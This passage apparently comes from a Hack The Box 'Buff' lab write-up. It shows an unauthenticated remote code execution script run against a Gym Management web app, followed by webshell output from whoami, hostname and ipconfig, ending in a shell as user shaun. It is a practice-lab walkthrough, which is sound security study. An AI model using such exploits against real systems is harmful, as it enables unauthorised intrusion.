Unauthenticated Remote Code Execution
┌──(kali㉿kali)-[~/archive/htb/labs/buff]
└─$ python2 rce_gym_mgmt.py http://$IP:8080/
[+] Successfully connected to webshell.
c:\xampp\htdocs\gym\upload> whoami
�PNG
�
buff\shaun
c:\xampp\htdocs\gym\upload> hostname
�PNG
�
BUFF
c:\xampp\htdocs\gym\upload> ipconfig
�PNG
�
Windows IP Configuration
ethernet adapter ethernet0:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::23b
ipv6 address. . . . . . . . . . . : dead:beef::e98a:2472:1538:99c6
temporary ipv6 address. . . . . . : dead:beef::e531:24da:e024:53e7
link-local ipv6 address . . . . . : fe80::e98a:2472:1538:99c6%10
ipv4 address. . . . . . . . . . . : 10.10.10.198
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%10
10.10.10.2
The exploit worked and I got a shell as the shaun user.
The session appears to be a bit unstable, so I will upgrade it to a much more stable session.